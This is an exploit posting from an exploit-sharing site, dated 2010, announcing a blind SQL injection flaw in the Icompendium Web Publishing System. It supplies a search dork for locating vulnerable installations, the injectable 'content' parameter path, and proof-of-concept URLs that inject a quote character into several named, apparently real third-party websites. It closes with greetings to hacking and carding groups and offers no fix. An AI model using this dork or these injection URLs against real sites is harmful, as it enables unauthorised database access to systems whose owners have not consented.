Icompendium Web Publishing System Blind SQL Injection Vulner
Posted on 01 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Icompendium Web Publishing System Blind SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================== Icompendium Web Publishing System Blind SQL Injection Vulnerability =================================================================== # Date: 01/08/2010 # Software Link : http://www.icompendium.com # Author: poni # Site : http://forum.xcode.or.id --------------------------------------------------------------------------------------------------------------------------------- Dork: [code]An icompendium Site inurl:/content=gallery.php[/code] --------------------------------------------------------------------------------------------------------------------------------- % [+] Vulnerable Path : http://www.daehyuksim.com/pages.php?content=[BLIND SQL INJ]gallery.php&amp;navGallID=XX % --------------------------------------------------------------------------------------------------------------------------------- % [+] POC : http://www.popboom.net/pages.php?content='gallery.php&amp;navGallID=1 http://www.hjbott.com/pages.php?content='gallery.php&amp;navGallID=5 % --------------------------------------------------------------------------------------------------------------------------------- & Greetz : [+] inj3ct0r.com [+] ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath, fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666,Phychole, Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr, And You... the marvellous XCoders those change the Indonesian Undergorund scenes # serverisdown.org, ssteam.ws, codenesia.com,hacker-newbie.org, YogyaCarderlink.web.id, devilzc0de.org, indonesianhacker.or.id ---------------------------------------------------End Of Paper--------------------------------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
